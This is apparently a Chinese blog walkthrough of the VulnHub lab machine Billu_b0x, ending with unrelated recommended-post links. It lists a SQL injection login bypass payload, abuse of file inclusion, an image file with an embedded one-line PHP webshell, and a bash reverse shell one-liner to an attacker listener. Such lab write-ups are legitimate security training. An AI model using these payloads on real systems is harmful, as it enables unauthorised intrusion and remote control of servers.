vulhub-Billu-b0x攻略

靶场下载链接

https://download.vulnhub.com/billu/Billu_b0x.zip

将kali和Billu,NAT连接

获取靶场ip

arp-scan -l

使用diesearch进行目录扫描

dirsearch -u " "

查看目录中的信息

打开add.php

打开head.php

打开in,phpinfo()的信息泄露

允许本地文件包含

打开index.php,登录界面,尝试使用万能密码登录(失败)

' or 1=1#

打开phpmy

打开test.php

使用get请求失败

在kali,使用post请求成功

存在文件包含漏洞和文件下载漏洞

使用此请求方式查看一下index.php

发现了登录的逻辑,明白了为什么万能密码会错误

只要在万能密码的后面加一个\就可以了

打开images,图片上传位置

登录

' or 1=1#\

成功登录

show users 显示用户信息,重点有图片

获取到图片上传的路径

右键点击图片,选择在新标签中打开图像

add 添加用户,上传图片

图片马

新建1.php文件写入一句话木马

随便下载一个图片,放在一起

copy 1.png/b + 1.php/a 2.png

将制作好的图片马上传上去

图片马地址http://192.168.31.138/uploaded_images/2.png

制作反弹shell木马文件

show users 点击continue时进行抓包

echo "bash -i >& /dev/tcp/192.168.31.138/8888 0>&1" | bash

将load改为图片马位置,在panel.php后放代码

在kali中监听8888端口

发送到重放器,点击发送,kali中可监听到shell,反弹shell完成

相关推荐
DianSan_ERP3 小时前
电商架构演进:如何在高并发场景下实现多平台API的标准化履约?
运维·前端·网络·安全·架构·自动化
恒5393 小时前
Linux文件系统I
linux·运维·服务器
阿成学长_Cain3 小时前
Linux ipcs 命令超全详解:查看共享内存 / 消息队列 / 信号量,IPC 运维必备
linux·运维·服务器·网络·数据库
黯然神伤8883 小时前
AlmaLinux设置软件下载源
linux·alma
青瓦梦滋4 小时前
协议定制/序列化-反序列化(Linux视角)
linux·服务器·网络·c++
运维老郭6 小时前
【K8s运维实战】Kubernetes临时存储卷实战:emptyDir核心用法与gitRepo弃用迁移指南
运维·云原生·kubernetes
珠海西格电力6 小时前
云边端协同架构:零碳园区管理系统的技术底座
大数据·运维·人工智能·算法·架构·能源
阿成学长_Cain6 小时前
Linux dirs命令详解|Bash目录堆栈管理快速切换目录实战教程
linux·运维·前端·数据库
小羊Yveesss7 小时前
2026年微信小程序后端怎么搭建?后台、数据、接口和运维怎么选
运维·微信小程序·小程序